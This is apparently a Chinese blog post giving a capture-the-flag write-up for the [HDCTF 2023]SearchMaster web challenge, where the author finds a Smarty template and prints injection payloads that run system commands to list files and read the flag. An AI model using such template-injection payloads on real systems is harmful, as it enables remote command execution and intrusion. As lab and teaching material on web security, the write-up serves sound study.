[NSSCTF] web之[HDCTF 2023]SearchMaster

最新推荐文章于 2024-06-05 09:11:19 发布
最新推荐文章于 2024-06-05 09:11:19 发布
阅读量807 收藏 1
点赞数 1
分类专栏: CTF题目笔记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZhangAweio/article/details/130329863
版权

前言

靶机:[HDCTF 2023]SearchMaster | NSSCTF

[HDCTF 2023]SearchMaster

看到题目的提示:ovo but you can post me a data

tip:你可以使用 POST请求发送data 

我们先对目录进行扫描试试,有啥东西。

 看到了有个 composer.json,我们打开它试试。

看到使用的是smarty模板,那么我们就可以试试,应该是有rec漏洞的

我们试着发一个{}

 

发现报错了,证明有rec漏洞的存在,那我们就可以smarty模板注入

构造payload

{if system('ls /f*')}{/if}

看到了这个文件,我们最后的payload就是

{if system('cat /flag_13_searchmaster')}{/if}

 

 

NSSCTF{b4a4a369-a409-48bf-b36c-7d163630b0dd}

Corrot_Pig
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[HDCTF 2023]SearchMaster
m0_73612768的博客
01-18 766
Smarty 模板注入;
HDCTF 2023 复现
weixin_63231007的博客
07-11 863
web yaml反序列化&quine注入&Apache SCXML2 RCE pwn 栈迁移&格式化字符串 crypto RSA
[HDCTF 2023]SearchMaster smarty模板注入初步了解
qq_75120258的博客
03-19 637
Smarty 是 PHP 的模板引擎,有助于将表示 (HTML/CSS) 与应用程序逻辑分离。大佬们都说这个模板现在很流行,因为它让前端制作者和程序员专注于自己的工作,不会因为前端修改或者程序逻辑修改了而影响另一边的代码。
[HDCTF2023] NSSweb方向题解
Leaf_initial的博客
05-06 1572
Smarty是基于PHP开发的,对于Smarty的SSTI的利用手段与常见的flask的SSTI有很大区别。了解过Jinjia2模板注入的同学应该知道,jinjia2是基于python的,而Smarty是基于PHP的,所以理解起来还是很容易,我们只需要达到命令执行就可以了。
HDCTF2023 Writeup
S4n_v1的博客
04-23 2683
HDCTF2023 wp,pwn 全部,web 2/6,crypto 4/5,reverse 6/7,misc 3/5 题解。
SearchMaster-1.0.0.2-win10.exe
09-28
桌面办公文件搜索工具,支持全文检索文件内容。可以支持pdf\ppt\ofd\word\excel\图片 多种文件检索。基于pyqt5开发
HDCTF2023 WP
m0_68757308的博客
04-23 1127
HDCTF2023 WP
HDCTF2023】wp
leekos的博客,分享web安全相关知识~
04-24 1019
sql注入题目,username必须为admin,此处我们需要从密码着手。乍一看好像是一样的,但是单双引号有点区别,我们需要再套。发现很多 0、1的二进制数据,我们把它提取出来放到。于是我们写个脚本将这些16进制的转化为普通的文本文件。我们除了让输入的密码与真正的密码一致外,还可以让。实际上此处为一张空表,我们需要使用另一种做法(其实这里的密码是字母(以前一般都是数字),使用。得到一个wav音频和一张绿色的图片,我们使用。写这种编码转化的脚本不是很会,需要多学一学。
HDCTF2023部分题解
m0_73700261的博客
04-24 285
我们可以post它,但是post什么内容呢,这里的模板一样我们试一试{{7*7}}发现回显了文件,证明这是个smarty的模板注入 ,接着就按正常的命令注入来就行了。直接去js源代码找弹窗函数。这个题目打开是一个博客入口。接着可以试试直接命令执行。发现他成功回显一个49。打开来发现是一个游戏。
NSSCTF-HDCTF2023-Yami题解记录
LeBR0NY的博客
04-26 289
NSS-HDCTF2023 web yami题解记录
2023HDCTF部分wp(pwn3,web1,crypto3,Misc1)
qq_51627915的博客
04-23 915
HDCTF部分wp,指我a出来的
GDOUCTD NSSCTF2023广东海洋大学比赛WP RE(上) Tea Check_Your_Luck
qq_73667990的博客
04-18 557
下载文件是cpp是个解方程的题,用python的z3。
NSSCTF-[NSSRound#X Basic]ez_z3 && [MoeCTF 2022]Art &&[HDCTF2023]basketball
weixin_61154173的博客
04-27 1249
RGB的初见,DFS代码求多解
Elasticsearch master节点的作用以及脑裂现象
vincent_duan的专栏
01-12 7001
Master节点 Master节点的主要职责是和集群操作相关的内容,例如创建或删除索引、跟踪哪些节点是集群的一部分,并决定哪些分片分配给相关的节点。 稳定的主节点对集群的健康是非常重要的。默认情况下任何一个集群中的节点都有可能被选为主节点。 索引数据和搜索查询等操作会占用大量的CPU、内存、IO资源,为了确保一个集群的稳定,分离主节点和数据节点是一个比较好的选择。 因此在配置中应该配置如下: no...
NSSCTF-Web安全入门-wp
网安小菜鸡
01-27 3157
NSSCTF-Web安全入门-wp
家用厨房安全新篇章:煤气安全阀结构与校验知识普及
BDjiance的博客
06-03 276
煤气安全阀作为防止煤气泄露的关键设备,其结构特点、作用解析、定期校验的重要性以及泄露风险的防范等方面,都是我们必须深入了解和掌握的知识。例如,某地一家庭因煤气管道老化导致泄露,而安全阀因长期未校验而失效,最终引发爆炸事故,造成人员伤亡和财产损失。此外,在选择安全阀时,应确保其符合国家标准和产品质量要求,避免因使用劣质产品而带来的安全风险。首先,安全阀能够在煤气压力超过设定值时自动关闭,防止因压力过高导致的煤气泄露和爆炸事故。最后,在使用完煤气设备后,应确保关闭阀门并定期检查安全阀的工作状态。
语音控制系统的安全挑战与防御策略(下)
声纹感知 洞察芯声
05-29 1141
活性检测已成为VCS中一种普遍的防御策略,主要设计用来确定语音命令是否来自真实的人类。这种方法背后的基本前提是,大多数恶意命令都是机器生成的。这些命令通常通过扬声器播放或直接通过音频文件(如WAV文件)输入到VCS API中。与这些人工产生的命令不同,真正的人类用户不会以这种方式生成语音命令。因此,通过识别人类语音的特征,活性检测旨在过滤掉这些非人类、机器生成的输入,从而增强VCS的安全性。
内网安全之证书模版的管理
weixin_45910629的博客
05-29 1200
证书模板 Certificate templates 是 CA 证书颁发机构的一个组成部分,是证书策略中的重要元素,是用于证书注册、使用和管理的一组规则和格式。当 CA 收到对证书的请求时,必须对该请求应用一组规则和设置,以执行所请求的功能,例如证书颁发或更新。这些规则可以是简单的,也可以是复杂的,也可以适用于所有用户或特定的用户组。证书模板是在 CA 上配置并应用于传入证书请求的一组规则和设置。证书模板还向客户机提供了关于如何创建和提交有效的证书请求的说明。基于证书模板的证书只能由企业 CA 颁发。
“网络战时代的国家安全:策略、技术和国际合作“
最新发布
2403_84237550的博客
06-05 353
综上所述,网络战时代的国家安全策略必须是多维度、多层次的,既要注重内部能力的建设,也要加强外部合作,形成一个立体、动态的安全防护体系。这不仅是技术上的较量,更是策略智慧和国际合作能力的考验。1. 建立全面的网络战战略:国家需要一个清晰、前瞻性的网络战战略,既包括防御也涵盖进攻,同时要体现“积极防御”的理念,即在遭受攻击前便通过情报收集、漏洞管理等手段预判并阻止威胁。3. 强化跨部门协同:建立跨政府、军队、私营部门和民间的协作机制,确保信息共享、资源调配和快速响应,形成统一的网络防御阵线。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值